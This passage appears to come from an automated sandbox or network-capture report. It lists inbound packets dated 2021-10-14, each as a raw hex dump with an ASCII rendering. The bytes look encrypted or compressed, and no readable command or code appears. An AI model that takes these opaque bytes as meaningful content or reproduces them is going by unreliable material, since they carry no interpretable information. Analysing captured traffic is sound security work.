42 0f 0f cd 18 34 e7 ba 7e fa 40 64 07 7a 67 48 7d b6 a8 ef 14 e2 e8 b3 d2 86 75 85 23 1d ad 88 12 16 d3 86 db 0c a1 c9 74 fa 72 df c2 d1 3a db 3b ad 04 b0 02 a8 84 Data Ascii: =L?aN9&/DU8NLP,<x{Q-dF#?I`T.'gB?ZfZCeMeZ$u^i$"`x!kyX6]k'QN-c7X}+vGS8:5D*0k}:B4~@dzgH}u#tr:;
2021-10-14 02:15:48 UTC	140	IN	Data Raw: 20 6c 4e ac 6e 40 b3 56 80 66 73 44 bb 92 7a 2d c5 fb 9e 13 a6 06 41 f2 42 12 56 6c 21 d7 de 04 19 de 02 7c 1a 7b d3 40 1f ef 62 02 b6 91 cd 1c 18 4a 26 e8 c8 c5 12 02 db ec 05 85 25 51 dc ad 9e 3e ba 2c 7b c2 aa 4f bc 9d 03 8f 43 7f 1c b9 9c 2e a8 04 b8 55 ba 8b c9 7a 1b 9f ea 43 70 57 f5 c0 8e 51 e1 0a 1f 72 86 fb 8b 48 3a a1 59 19 dd d9 02 1e 6d 06 19 24 8a 80 27 c7 33 c1 c4 4f 59 94 4d c5 b9 3f 22 d5 87 69 42 f6 b0 d0 a2 f1 b0 c2 cf 53 dc fe 04 36 35 07 73 6a de 7f 40 22 f0 45 23 f1 57 f2 5b c0 10 b4 61 19 e0 bd bd f3 e0 27 7d ff b9 1f fd 9d f0 7b 99 55 8b 4d 58 74 21 47 d4 85 e5 5a 3d 33 b7 e5 c8 15 2a 42 17 6b ee d6 f0 9c a4 5f f9 a1 f0 9d b0 6f 2e 98 a7 c8 79 f2 e0 b5 6f 07 d9 10 37 9d 53 23 f6 81 db 0e 19 18 9c 9d 16 49 d0 32 47 bf 65 85 1b 69 f0 Data Ascii: lNn@VfsDz-ABVl!\|{@bJ&%Q>,{OC.UzCpWQrH:Ym$'3OYM?"iBS65sj@"E#W[a'}{UMXt!GZ=3*Bk_o.yo7S#I2Gei
2021-10-14 02:15:48 UTC	141	IN	Data Raw: d2 1c b1 38 f4 50 80 bc 77 2a 73 54 c1 a5 13 29 09 2f f1 ab 96 e8 22 2e 72 bd 3a 6a 02 a8 e3 25 c2 31 46 e4 34 64 09 c3 b2 db 2b 7f 00 00 18 95 2a dd 3d 04 3d fb 94 d5 61 84 6e 8e 07 88 d5 90 66 ca 20 db 84 e6 a7 1d 01 2d 4e d0 fa 95 39 00 6f 13 75 f6 6c bb 8d 9a e6 98 c5 37 e8 88 ea 09 24 76 d6 c5 da a2 ac 2b e0 50 2b 4a ac 30 b8 1f e2 5e 3a dd 70 72 0e b5 f6 87 76 83 76 19 3e 09 a5 52 26 41 43 79 9b cb 1e 53 04 e6 3e 60 12 69 5b eb ba 70 c9 7a 02 30 02 05 b3 f6 66 44 60 85 21 74 52 04 ac 1a 08 14 ee 32 4a c4 1a b5 ed b1 b4 52 89 e2 10 6b 23 93 a9 b3 e2 61 e5 eb 2d 27 7f 37 c0 67 da 3a 50 b7 36 58 40 88 2d 22 c3 be d5 6a f5 c5 8f 1a 13 f5 bd d0 15 a8 62 93 f2 0a 01 ce 10 ef 32 ae 0f f7 c2 76 93 f1 17 f9 fb a5 21 c0 75 b6 c0 1a 30 c7 9d 5a d7 52 d8 02 5b Data Ascii: 8PwsT)/".r:j%1F4d+==anf -N9oul7$v+P+J0^:prvv>R&ACyS>`i[pz0fD`!tR2JRk#a-'7g:P6X@-"jb2v!u0ZR[
2021-10-14 02:15:48 UTC	143	IN	Data Raw: d7 ca 35 c3 de 1a a5 1f 81 86 e8 d9 b4 8d 06 b3 d6 4e f6 7d 38 1e dc ae 5d f6 a3 45 6d fc 4f 1a a1 6b a2 ef 57 53 c6 32 9a a0 38 51 d3 f7 45 93 8c a1 4b 71 de 9e 25 4d 26 f7 03 bf 3e a4 26 6d c9 d5 32 49 67 16 f7 f4 29 1d f4 82 28 05 04 4a 45 3f 34 43 2c b4 0b e8 ab 2f 41 14 11 e9 eb 10 22 ec d7 a1 a5 3a 41 eb 8d b4 13 be 06 fb 96 b5 30 25 98 23 6b 62 50 1e 23 b9 99 9f 0f 8a 93 9b a4 cb 5a 5c a4 5b 63 6f 74 c2 e0 a4 7c e5 20 9b 26 99 84 12 4d 1a 44 78 29 df 43 27 a9 59 0d 2b e3 ab b0 25 e7 59 fa 7a 6f 40 bc 7f ca 91 14 0a 57 ff da c5 88 2d f1 40 f4 90 f3 57 76 f1 75 07 3b c5 20 53 5b fc 12 5b 02 3b 78 0b dc 4a f9 75 c7 94 ca fe 32 62 c7 04 11 e1 23 5d 57 9e 32 ef 21 f5 b5 89 73 ab 5f 2e 6f 21 67 1d b0 cd 77 22 1b 9c cd 4e 6d 99 c5 69 f6 cf 32 f5 bc 97 c7 Data Ascii: 5N}8]EmOkWS28QEKq%M&>&m2Ig)(JE?4C,/A":A0%#kbP#Z\[cot\| &MDx)C'Y+%Yzo@W-@Wvu; S[[;xJu2b#]W2!s_.o!gw"Nmi2
2021-10-14 02:15:48 UTC	144	IN	Data Raw: c3 7f e0 9c 48 29 26 2c a9 3c 00 c3 84 8f 22 84 2f cc 53 7b b4 40 cc 40 b1 aa c4 2c e2 47 14 2a d6 17 01 fb d8 d8 f4 02 bd f8 9e d0 b9 dd 7d 86 9c 74 02 f5 2a c2 81 3e 3c 0f 5b f6 a9 96 72 27 ee 7c 9b 1a 25 28 85 e1 05 fc 38 c0 9a b2 71 21 ea 90 dd 2f 55 82 e4 a4 b9 38 ff 3d 57 3d fb 94 6f b6 b5 7f a8 38 d1 ff bd 64 ea 6a d2 02 98 20 34 2c 2b 6e d1 d2 13 47 03 4b 3e 63 f0 1a be 8f 9a 7c 9d 16 39 ce a8 a3 1d 0c 5b f4 91 ff 88 2e 4a 61 79 06 4c 8c 3e 90 99 9c 5d 1e f0 65 74 79 bf f4 87 ec 86 4f 16 18 29 ec 78 0b 43 63 13 92 4d 60 d5 15 ce 17 42 1b 6d 71 6d 5e cc e5 68 20 30 53 05 b3 f6 dc 7d 50 97 07 4b 01 2e 81 18 28 6e e7 b4 34 42 03 9d c4 93 be 56 a3 64 f4 d7 0f 81 8b b3 b1 61 e5 eb 97 25 4f 25 e6 58 8f 10 7d b5 16 ca 49 0e 53 a4 cd 96 fc 48 fe c1 a5 98 Data Ascii: H)&,<"/S{@@,G}t><[r'\|%(8q!/U8=W=o8dj 4,+nGK>c\|9[.JayL>]etyO)xCcM`Bmqm^h 0S}PK.(n4BVda%O%X}ISH
2021-10-14 02:15:48 UTC	145	IN	Data Raw: 02 26 a7 48 75 e1 91 32 3e 75 2e a5 f9 dd 89 16 ca cf 66 0f e4 a9 e8 6b 42 11 e5 a7 91 fd 7e 4a 5b 8b 29 18 34 bf 0f 41 15 c5 ec 0a e1 f4 37 a7 3f ef 89 6a a7 32 ad 2e 9a f4 62 f2 57 be fa 60 82 4c d4 a3 12 6d fc 4f a0 16 66 b0 c9 6c 00 e9 30 9a 86 9b f2 ad 6e 5b bb a0 ac 64 73 d8 b4 3d 16 92 e4 25 9b 33 da 24 6d e9 d8 37 64 76 2f da a0 06 1f f4 a4 b3 a6 7a d3 53 17 1d 61 02 b0 21 6a 4f 93 6d 06 33 e9 b8 10 22 ec 6d 20 a8 2b 67 d4 fd 9e 3e bc 26 4f 99 33 4e ab b1 0e 6d 42 79 36 a5 c7 9a bb 22 9c 95 c5 89 c9 5a c6 a1 c7 51 49 54 a3 ef 8c 51 c7 93 b8 0c 1f e5 84 64 37 42 58 1f f7 c5 59 aa 7d 20 3d e5 f4 82 27 e7 c3 ff e9 5d 66 9c 1f c5 b9 39 28 95 dc f0 43 e9 ba d8 6d f2 b0 c4 7f f0 8f 76 23 16 d3 26 f3 68 fe 12 c1 07 dd 4a 2d fc d5 f0 5d ea b6 1a dd 18 e0 Data Ascii: &Hu2>u.fkB~J[)4A7?j2.bW`LmOfl0n[ds=%3$m7dv/zSa!jOm3"m +g>&O3NmBy6"ZQITQd7BXY} =']f9(Cmv#&hJ-]
2021-10-14 02:15:48 UTC	146	IN	Data Raw: ed 92 f7 39 5f 0a 3e 20 c0 eb b3 e1 09 16 e7 88 7d fa 40 de 9b 71 76 6e 4a 23 84 ed 14 c4 5b 28 ac 1f 69 ad 0a 3f 3d 8c 38 94 37 3a f7 1d 83 c9 5a f9 72 df 78 4e 31 ca 1d 95 92 9c 00 a8 a2 e6 6e 84 41 db a7 7a 3a b8 04 2c 72 98 be 15 9b 8e 2e c2 40 06 ec 93 6f ff 10 3f d9 58 cd 25 7e fc a7 82 eb 92 b7 8d 16 e8 e2 00 0a ce 3e aa c8 2a 02 05 1a 42 a9 58 f3 96 78 2a 32 74 79 d5 69 4b 80 73 49 40 f3 a8 ac 51 a0 02 25 f7 0b de 64 d7 2e e1 8d e8 26 a7 48 cf 7b 9a 20 18 42 7f 8a fb dd af 63 6d b1 ff 11 ed 85 e5 fd 40 17 cf bb ca 49 6e 6c 7f 3f 51 1a 34 9f 55 42 38 d7 d2 02 b6 f4 37 a1 35 05 d2 f3 a6 2d 88 26 22 f4 62 f4 e7 1d a9 e8 a5 6c 45 81 69 6f dc 8d 1c 33 4b b5 c7 61 79 eb 36 b0 24 6c 4e ac 6e 40 b3 1e 83 66 73 44 bb 92 79 2d c5 b3 9d 13 a6 06 ae cf 42 12 Data Ascii: 9_> }@qvnJ#[(i?=87:ZrxN1nAz:,r.@o?X%~>BXx2tyiKsI@Q%d.&H{ Bcm@Inl?Q4UB875-&"blEio3Kay6$lNn@fsDy-B
2021-10-14 02:15:48 UTC	147	IN	Data Raw: 21 47 51 b5 e0 66 19 13 07 cd 4e 6b 93 aa 30 6f ce 2b d9 b1 a6 c5 da a6 64 c5 09 8a 2f 9c 87 5f f2 e9 e0 2f 55 23 e3 1b 15 2a 57 09 70 df ae 28 19 1c a3 71 3f 64 d2 a8 64 b8 f5 dd a2 8d f1 89 95 ec d8 12 f0 6c 92 ac 48 46 fe d9 5a e2 9d 62 5d 8f b5 4a 09 52 b6 ce 54 0a 7b 0c 22 53 4a a3 62 30 e8 c3 25 b4 c1 1b d8 00 7d d9 57 72 23 f6 87 42 f0 08 c6 16 83 90 d9 6f e9 fb b3 17 dc 82 92 9f ee ea 85 d7 9f c6 19 96 0b 71 3f 3e 57 16 37 c4 f1 7b 1b 2d 64 43 bc 57 92 46 2d 54 0a 75 d9 84 e3 4a 91 2d 0d bf 90 2c 59 9b 31 56 5a b5 b9 2e 41 7b a0 1f 63 5b f7 ea 61 d3 bc 7f e0 9a 42 a9 7b b5 a8 23 1e cb 15 8f 22 82 9f 6f 00 f0 93 60 74 62 e2 a8 e4 0d 50 62 39 27 e6 1f 7f fb d8 de fe a4 e0 61 9f cf a5 d5 ed 86 9c 72 b2 56 79 49 a6 1e 85 2d 0f f4 89 a1 c0 02 c3 71 b3 Data Ascii: !GQfNk0o+d/_/U#*Wp(q?ddlHFZb]JRT{"SJb0%}Wr#Boq?>W7{-dCWF-TuJ-,Y1VZ.A{c[aB{#"o`tbPb9'arVyI-q
2021-10-14 02:15:48 UTC	148	IN	Data Raw: 48 b1 be e1 d7 12 79 95 eb 5c 6a 0e c9 9e ef ac f7 6a 23 c5 8f 1a a9 9d bb c2 33 97 60 b9 df 08 21 fb 27 69 4c 28 03 df eb 54 4d f5 3d 7f 1f 19 0d d2 57 b6 12 1a 30 c7 27 29 d1 40 fe 3d 5c 5e 43 5f 0b af c5 92 bc e8 ab d2 82 48 72 0c 1f ad 14 1d b9 bf 39 fa d3 a7 e9 ca db 13 f4 58 f4 08 c5 35 a0 b8 b1 04 82 22 b2 75 fb d8 de 87 9e 18 29 06 b6 57 2f 89 1e aa 48 0c 53 42 26 9c 98 d3 d9 0f 33 e6 5d e2 27 78 d0 0b 7e 0c 0a b6 89 32 29 72 02 0a 54 81 a2 f7 1d 04 c4 8a 40 a9 78 af 00 5e 2a 2d 48 79 d5 69 4b 80 73 49 40 f3 a8 ac 51 a0 73 25 f7 0b de 64 d7 2e e1 8d 99 26 a7 48 cf 64 97 20 18 4d 7f 8a fb dd af 63 6d b1 ff 11 ed 85 e5 8a 40 17 cf bb ca 49 6e 6c 7f 48 51 1a 34 9f 37 4f 38 d7 d4 02 b6 f4 37 a1 35 01 d2 f3 a6 2d 88 26 53 f4 62 f4 e7 1d a9 eb a5 6c 34 Data Ascii: Hy\jj#3`!'iL(TM=W0')@=\^C_Hr9X5"u)W/HSB&3]'x~2)rT@x^*-HyiKsI@Qs%d.&Hd Mcm@InlHQ47O875-&Sbl4
2021-10-14 02:15:48 UTC	150	IN	Data Raw: 07 ff 2b 71 6a f8 38 dd 5c 69 59 0b d8 75 f6 5e ea 96 50 dd 35 f2 9f bd 14 e2 27 7d 45 a6 1f ef bb cf 89 b0 78 89 6d 2a 45 a7 39 52 91 cd 73 1f 36 b2 cf 4e f1 96 6e 05 49 ee 37 f2 9c a4 e5 97 a1 e2 bb 8f 84 07 b5 a5 e8 f6 c3 66 cb e9 0f f1 39 15 9b 56 09 70 65 67 22 0b 3a 9c 7e 14 49 d0 88 38 bf 77 a3 24 83 d9 a0 b7 54 dc 38 72 88 2e 80 59 64 fe 66 5b e2 9d d8 8d 85 a4 6c 37 7d 98 cc 54 2c 38 a7 5c ca 55 8b 4b 12 51 c7 0f 36 25 a7 f4 12 5f d9 e6 73 23 f6 3d 9a fa 19 e0 29 87 bb f4 6d c9 8c b4 91 a2 07 bb b2 e8 ca 39 ff 19 b8 1a b2 26 67 39 17 ee 14 37 5e f4 5f 21 0b 44 55 b6 7f bf 64 5a 7f 20 f3 b8 2f ca 67 97 0d b0 97 16 52 5a bf 1c 40 5c 9f 01 2c 41 e1 a5 20 59 7d d7 ff 6d fb 91 5d 49 b1 68 2f 1a 37 81 0e 18 eb af a7 a4 fc 9c 4b 2d e6 95 4b cb 60 e2 32 Data Ascii: +qj8\iYu^P5'}Exm*E9Rs6NnI7f9Vpeg":~I8w$T8r.Ydf[l7}T,8\UKQ6%_s#=)m9&g97^_!DUdZ /gRZ@\,A Y}m]Ih/7K-K`2
2021-10-14 02:15:48 UTC	151	IN	Data Raw: b2 82 bf 19 4a fd e9 d2 30 9c cc e0 90 36 a8 b9 e8 84 ef 79 13 1a f6 aa db b2 07 c4 b3 e7 25 61 e8 ea 86 b8 2e b6 b8 0d 55 24 69 9c 77 dc 0a 21 f4 51 39 5c 4b 32 d3 ba d6 ab 3d d1 ae fd 70 e1 8e d7 8d 42 fc 12 b4 ce 5a 7e c1 79 9a 0b df 6f b3 fc 3f b3 d6 69 7d 84 6b 31 d0 44 84 cf 0d 74 ec 1c 69 e7 03 a0 1e 44 66 6c 5b 0f bd eb 43 f8 65 8d fc f4 01 ac 12 15 95 a0 17 9a 8d 34 f8 72 c0 f0 c1 f6 11 a1 55 e9 07 a2 6e 94 bb c7 14 98 95 14 22 21 02 4e 28 9c d2 fc 85 ac 81 c1 5f f3 59 77 c7 8e 9f 99 06 7c 0b 19 83 c1 1e ab 32 a9 eb 3f 55 ce 69 e9 55 4f fe 27 96 f7 e5 21 4d 78 14 c0 d3 d1 42 b1 50 b0 39 d8 bf df ff b7 af 0f 8c ce 1e de 44 a4 d9 12 28 d9 07 1e b1 62 cc ee f0 5c 87 4a 26 f7 be 35 c1 4b 52 3e a2 87 cd cd 0e 64 7f 0f e4 4e 77 d9 91 40 23 61 8d e2 a4 Data Ascii: J06y%a.U$iw!Q9\K2=pBZ~yo?i}k1DtiDfl[Ce4rUn"!N(_Yw\|2?UiUO'!MxBP9D(b\J&5KR>dNw@#a
2021-10-14 02:15:48 UTC	152	IN	Data Raw: 10 59 8e 02 68 70 37 28 3e 8c dd cc 6e bf 12 96 ac 2f 3f b6 71 d1 ae 2d 1d 7d a7 8b 2f 8a d5 9d 20 97 89 e2 04 11 85 98 50 63 be 7a 50 54 a0 7e 36 5c 8a 2b 7b be 2b 89 26 ba dd f7 c3 3a b5 80 83 17 f0 29 7d 6e 9e 6c da a0 d8 93 96 44 86 75 6b 5c 22 47 d6 8f d9 62 3e 10 95 e9 3d 75 ab 50 5a 59 ec 1f d1 a9 85 f4 f5 b9 c9 a3 aa a6 11 b2 9b c8 c0 ca d0 93 46 3d dd f2 e6 45 8e c2 ac 20 c1 c5 cf ee 72 a4 c3 83 0c 7d b0 1e fc 70 e5 59 20 11 65 97 0a d2 26 30 61 78 b3 98 36 88 ae 0b 68 b0 59 4d 47 bf be 96 6b 33 ad e1 a3 67 a6 34 a5 71 92 ed a1 3e de 0e ad bb 73 93 df 76 66 f9 e1 7e 34 38 0c b4 4e 83 0f 6c 46 f1 75 6d 12 04 39 80 05 1d 47 48 a5 51 2d 22 3c 16 9f 88 a3 a0 4c bd 91 7d 35 99 92 c9 fd c2 0f d3 07 c6 a6 e1 8f 7d 00 a2 41 ee 21 a9 5e b2 eb 6b 99 e4 66 Data Ascii: Yhp7(>n/?q-}/ PczPT~6\+{+&:)}nlDuk\"Gb>=uPZYF=E r}pY e&0ax6hYMGk3g4q>svf~48NlFum9GHQ-"<L}5}A!^kf
2021-10-14 02:15:48 UTC	153	IN	Data Raw: b9 68 d5 e3 70 91 00 2c 1d 83 91 e8 19 d1 45 63 54 7f cf 10 2f 7f 7f 53 9c 3d 12 ec 22 d2 13 2f 48 36 4d bf 66 5d e4 6a 3d 4c 54 01 bd fe 55 1c 7b 90 36 7c 52 6f dc 47 45 50 d5 a5 73 1d 4e ff e7 9d cd 65 fc 83 a3 6d 2d b7 f2 ef cf 4a cc db 68 39 56 03 f6 54 b4 6c 03 d7 55 6c 5a 6e 32 cd a9 6f 3c db 2a 55 0f d0 4b 1c 47 5c ae 48 a1 5b 23 90 f9 2a d8 3e ff 30 9d 4e 6c f4 40 20 bc fd 12 88 d0 0e c9 28 3e a8 92 23 eb 91 0f f8 45 c0 bd 82 81 e5 f1 58 1c e7 2d de 1b 61 27 ce 58 fb bc 71 47 ee 06 05 c1 07 9c 7b 25 4c 75 fa 4c 82 2d 8b 5e 8b 00 64 2d 91 39 39 4d 21 29 0d 1d 63 e9 b1 d4 f8 c7 82 b6 11 c4 7a 16 f2 bd e2 ae 46 02 37 61 a7 88 64 dd 53 96 90 4f 32 bf 37 fc 01 37 54 8c 2a 16 06 c2 b8 92 a5 79 32 32 8c 59 f6 3e bd 42 2a 6e 30 7c 0b aa 37 0c 88 3f 94 67 Data Ascii: hp,EcT/S="/H6Mf]j=LTU{6\|RoGEPsNem-Jh9VTlUlZn2o<UKG\H[#>0Nl@ (>#EX-a'XqG{%LuL-^d-99M!)czF7adSO277Ty22Y>Bn0\|7?g
2021-10-14 02:15:48 UTC	155	IN	Data Raw: fd 6d 32 cb e1 5b 58 12 0b 02 29 8d 26 bb 2a 9d b6 f9 ac c8 4f 5b bf c9 49 7a 68 c9 f1 ae 6d f3 2f 80 12 0a d7 a8 48 0b 47 32 16 f4 7e 08 20 5c 02 1c ef a5 b2 2c c1 77 f0 ec 59 71 8b 51 ea d7 22 6b 45 9f 94 25 95 cd 95 dc 6f 29 46 cf ed 1e 04 ad 8d 35 e5 e0 e0 69 81 d0 ab 0c d9 83 56 af 7d aa 6c 71 12 20 cb 3b 7b 64 bb 3a cb 90 9f 62 da 4d 76 3f 6d 7b e1 4c ab f2 c1 8d e7 6c 22 69 dd ec 98 0c 6a 9a cd 17 fb bc b6 17 ee 32 45 78 10 06 57 3a 1e 32 5f 89 48 68 44 61 7e 7a 25 fb 80 23 99 a0 0e 83 ae e5 79 fb b3 be a7 16 97 98 f6 77 0f c7 3d c5 0d 9e 25 1a 63 59 c8 36 fe 68 1b 48 11 bf 85 3c 9b b8 72 81 2f ad b9 d8 20 0d 7a 8c df 42 14 45 9a 4a a9 48 a1 67 6f 38 97 77 ed 06 7a b6 03 2e bc bf 21 4c 93 db df b8 6b ea 54 e4 d8 9f 09 9d da cd e6 d7 74 ee e5 80 ba Data Ascii: m2[X)&*O[Izhm/HG2~ \,wYqQ"kE%o)F5iV}lq ;{d:bMv?m{Ll"ij2ExW:2_HhDa~z%#yw=%cY6hH<r/ zBEJHgo8wz.!LkTt
2021-10-14 02:15:48 UTC	156	IN	Data Raw: d4 06 06 1a 3b 75 c6 e0 d5 63 b2 7b 62 6b 97 15 f0 99 fe f2 df 58 39 8f ec eb 2f 29 6e e6 eb f6 aa 07 20 48 66 1c 4d 93 09 89 3b c1 b8 24 c6 5c 6d d8 75 30 4f af 7f bc ca ec cb 68 a8 c6 81 9e ea 66 97 ab 07 de 2b d9 8d c8 ab 98 2a fe 90 31 ae cb c4 f0 ef 51 0d f7 fd d1 2d 88 87 be d8 71 f8 e0 d6 2c 4c d9 b1 f7 40 09 63 5d a4 40 05 7c b0 80 0c 55 25 74 e3 7c 68 8b 90 bf fe 08 b4 1b 82 f4 2b 91 ca f5 82 db 23 42 12 51 da 7b 43 0b 87 31 7a 2b 6e c0 6f 8b 77 19 95 80 5f a8 47 83 1a ac 76 54 de 20 5c 91 fd 24 8a 82 67 c2 33 79 a9 7e 9e 4a 25 a7 0e b1 6c 1a 20 20 08 71 fe aa 42 8b 3d fd 99 dc 24 e5 5c 5f fb cc 6a d9 b2 05 c5 2f 82 c9 ed df 54 ae 7d d8 3e e3 5f e7 dc c2 74 ff de bd 99 b0 b5 a7 d4 1f 6f 56 65 57 23 7f e0 33 8d 82 0b 52 4e 01 d2 a4 d2 ca 05 2b c0 Data Ascii: ;uc{bkX9/)n HfM;$\mu0Ohf+*1Q-q,L@c]@\|U%t\|h+#BQ{C1z+now_GvT \$g3y~J%l qB=$\_j/T}>_toVeW#3RN+
2021-10-14 02:15:48 UTC	157	IN	Data Raw: 2b ca f6 30 3b c1 9f 17 b3 49 eb 77 46 2d 53 30 85 3c d8 15 07 66 02 0e fd 1d cd cc 11 09 f6 6a fb 8a 32 4e 49 b8 29 8c 68 5a ce 97 73 48 ee ba 8b a8 dc cf 59 c0 64 f5 46 1f 73 6c 2e ba b6 6b 13 9d c6 da 24 06 67 e9 32 db 75 e7 f1 0b 66 b4 b9 ee e4 d9 2d a6 c3 d0 86 b8 b6 13 5e 20 a9 66 d1 06 1b 80 ef 3b ea 46 62 90 9e ce 72 7a fa 5e 19 63 c3 70 25 55 d6 e3 58 6c 99 ad 69 a1 c8 c5 5b 8c cf b1 6e d8 98 48 cc 7b ef 46 2a 67 7b b3 4e 34 28 b4 40 df c3 df 20 50 8b c0 ad e3 fe 3d f6 18 4b 18 53 3e aa e0 b8 1d 53 4f b5 ba 14 2e c3 1e 40 3a b6 52 96 c9 f5 ab be ea 8c f6 ed e2 43 ee c1 ac 94 8c 95 c8 05 60 85 57 70 e0 2c 61 1d b1 17 6b 78 66 c2 1f 76 0d cf b8 7f c7 4b aa 24 98 f7 9f e9 09 ed 19 e7 f8 f1 c2 70 7f d2 6e 52 ff 9c 56 e4 e5 97 4d 07 42 ed bf 5c 2c 71 Data Ascii: +0;IwF-S0<fj2NI)hZsHYdFsl.k$g2uf-^ f;Fbrz^cp%UXli[nH{F*g{N4(@ P=KS>SO.@:RC`Wp,akxfvK$pnRVMB\,q
2021-10-14 02:15:48 UTC	159	IN	Data Raw: 23 69 25 f5 00 d4 06 5a 50 b5 cf 11 5a 1e f9 9e dd 45 e5 75 f5 24 c0 d2 e7 01 6c 00 7b 71 9a 6f ff 5c 33 7b b9 1b fc 2e ca 48 e1 cf ef c9 9d 24 1c 7d c7 5e 92 c5 8a 23 b7 41 64 56 31 41 d4 d2 1c 0b 72 ab b3 86 15 18 77 05 b5 d8 f9 de a0 fa 08 b6 29 bb 48 4e 8f 7e fd c1 b8 11 59 1c e0 3e fb 92 a9 97 1b c6 b0 fa ef d1 21 f9 ce 7e a7 7e af e8 af d4 f0 54 92 a9 7f d3 9b a5 a9 8d 22 4d eb 1f 37 c4 64 19 1b 61 c5 56 77 6e b3 fb 61 0d 4b ee be fa f3 01 c4 bb eb 2c 4f de d9 d7 be 3a f0 a7 6f 64 0e 4a ef 5c a3 28 48 9c 6b 1e 02 72 3b c0 b0 ca 94 39 80 b2 fe 54 c6 81 e2 b7 4b e9 12 8f ea 3e 09 f0 01 ec 2a bd 15 91 fc 77 97 a3 04 44 9d 27 36 cb 60 9e 9f 19 37 d0 24 6c ec 50 cf 01 6f 4e 48 60 21 b5 ed 06 b2 79 84 e7 b5 7f a5 00 14 bd b8 15 bf b8 2c eb 30 98 d1 f2 cb Data Ascii: #i%ZPZEu$l{qo\3{.H$}^#AdV1Arw)HN~Y>!~~T"M7daVwnaK,O:odJ\(Hkr;9TK>*wD'6`7$lPoNH`!y,0
2021-10-14 02:15:48 UTC	160	IN	Data Raw: f8 6c 89 f9 e7 8f 7b 3a 94 94 42 82 31 00 b3 71 1f c5 e5 3d 23 25 91 96 28 77 53 9f e0 1f 98 39 ac 1c 9b d7 47 fd a7 8d 80 8a 67 55 99 94 3b 21 81 15 fc 41 cb bc a3 a7 a6 2f 93 75 bb 87 af 9b b8 49 57 9b ed 26 64 98 13 84 b4 00 3a 26 83 19 a5 58 41 cf a0 09 2a 95 c3 f6 c3 fa c6 03 bd 12 9e 74 5a 44 3e 7e f9 e9 6f 93 09 21 3c 81 ab 80 3e b7 6c ca 5e 5c af 8f 44 43 14 0e 56 86 0e 6f 2e 36 7e 65 c5 9d 9a 60 f2 7e be ec 64 12 d5 05 b2 de 5e 57 3d 9a 8e 24 9b cf 82 36 c7 d6 b0 25 49 c3 bd 03 37 83 20 56 3c a5 4b 77 7a ad 72 56 85 71 a0 08 ca b2 ee d8 38 dc ea a0 07 fb 2b 56 71 9a 29 b6 83 c8 8b 89 58 8e 40 31 68 26 59 d2 98 fb 55 1d 1e 92 db 65 48 9d 6f 2e 44 f5 31 e9 ae 81 f8 e0 b2 d5 88 89 bf eb 52 68 24 2c 1a 1c 79 a1 de 26 f3 e1 5e 82 f0 8f 2a 99 e6 c6 d0 Data Ascii: l{:B1q=#%(wS9GgU;!A/uIW&d:&XAtZD>~o!<>l^\DCVo.6~e`~d^W=$6%I7 V<KwzrVq8+Vq)X@1h&YUeHo.D1Rh$,y&^
2021-10-14 02:15:48 UTC	161	IN	Data Raw: 9c 99 8f 93 0f 9b f9 48 71 7e 75 d0 22 0f 3b 3e 57 32 8f 58 42 a9 a4 ac da 8b 5a ee e1 f1 bf 79 22 21 74 97 4e e3 78 8f e2 ab 02 70 ba 51 89 47 20 01 f9 a8 60 6f 20 ba f0 a3 2a 98 3b 91 5d ab a3 b6 45 3e 45 2c 2b fc 26 a7 35 48 1e d6 7c 96 16 19 d0 24 01 02 36 7a 9c bc 9b 2d d8 0a 2b 6e cd 40 b2 d1 8e e1 b5 3e 2e ef dd f7 4b 0f 59 83 94 ae b1 16 6c 47 68 16 76 b8 0a f8 7b 96 a8 7e 99 1e 3b 16 e0 a8 a8 5a 8e 40 27 1e 28 9f 4d 2e 78 11 21 f9 0c 46 c4 1a e3 74 03 0d 6f 4f ff 2d 5f f0 33 6e 45 55 16 ae ff 5d 5d 68 d4 35 65 59 3c e6 3c 32 3f ef 89 51 45 37 9d c7 bf 8f 37 a9 c6 a4 74 34 b9 a2 a9 94 58 d8 ca 30 30 40 33 d1 7c 29 fc 9b 5f dd d1 bd d8 c1 22 3a 2d 0a e4 13 2c 61 e4 76 2c 7c 5d 86 7a 98 76 07 ef c4 1e eb 13 f6 7d aa 5f 2e b9 55 3f fc a8 4c f9 e3 09 Data Ascii: Hq~u";>W2XBZy"!tNxpQG `o *;]E>E,+&5H\|$6z-+n@>.KYlGhv{~;Z@'(M.x!FtoO-_3nEU]]h5eY<<2?QE77t4X00@3\|)_":-,av,\|]zv}_.U?L
2021-10-14 02:15:48 UTC	162	IN	Data Raw: 3d 79 79 8e b7 06 b7 83 2a 5d 90 6c 70 6c 93 ee ae 78 2b 9f e9 b6 60 be 33 e7 61 85 f2 b8 33 cf 45 b2 8b 2c f9 a6 0e 1b 9b d8 0b 50 7d 22 f0 22 f9 28 32 75 e8 44 7e 1c 19 2e 8c 5d 33 6d 44 b7 1e 28 5c 12 26 99 f8 81 91 7a 94 b4 0e 4e eb a1 b7 ef f4 1e d9 04 e5 95 dc 8d 5e 01 b5 43 f8 23 a9 18 0f 27 9b 36 00 a3 fa c1 33 bc 89 d9 cd 39 bd 20 13 bc b3 35 ba c9 13 ad d1 2e 67 44 7e ff 67 54 b9 fe da 37 c8 4a 12 6d bf e4 1c 9b 16 b5 fe a1 52 1e 1f 74 58 92 5c 39 9d ad ab b3 51 f3 92 ea ff c9 8d 3d e8 f7 00 48 04 34 38 f9 5f 45 5e 00 ed 8f 9e eb 08 c3 6e ff 69 3b 68 84 e1 24 c4 1b c0 9a ad 69 09 c7 92 ab 1d 51 30 b4 0e 88 0b ca 24 02 3f fb 94 f1 93 f8 6e 8e 18 28 7e bd 64 e9 58 f1 02 94 ba 1c 01 7d 5b d7 f8 b6 6a ee 38 57 09 b7 3f bc 8f 9a e6 d8 82 2b e8 98 f5 Data Ascii: =yy*]lplx+`3a3E,P}""(2uD~.]3mD(\&zN^C#'639 5.gD~gT7JmRtX\9Q=H48_E^ni;h$iQ0$?n(~dX}[j8W?+
